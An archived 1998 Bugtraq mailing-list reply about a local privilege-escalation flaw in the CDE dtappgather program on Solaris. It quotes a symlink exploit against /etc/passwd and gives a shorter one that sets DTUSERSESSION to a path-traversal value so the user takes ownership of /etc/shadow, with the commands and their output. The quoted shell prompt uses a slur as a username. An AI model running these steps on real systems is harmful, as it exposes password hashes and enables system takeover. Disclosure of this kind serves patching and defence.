Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: /usr/dt/bin/dtappgather exploit
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 24 Feb 1998 20:30:20 +0100



        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r () host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r () host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r () host% dtappgather


    the exploit is much simpler than that.
        hey, it's even documented on the man page :-)

    Simply

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow


    Anyway, your exploit has an advantage: it works (at least,
    in solaris 2.5), even after patching CDE according to CERT
    advisory.
    Solaris 2.6 seems to have the right permisions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]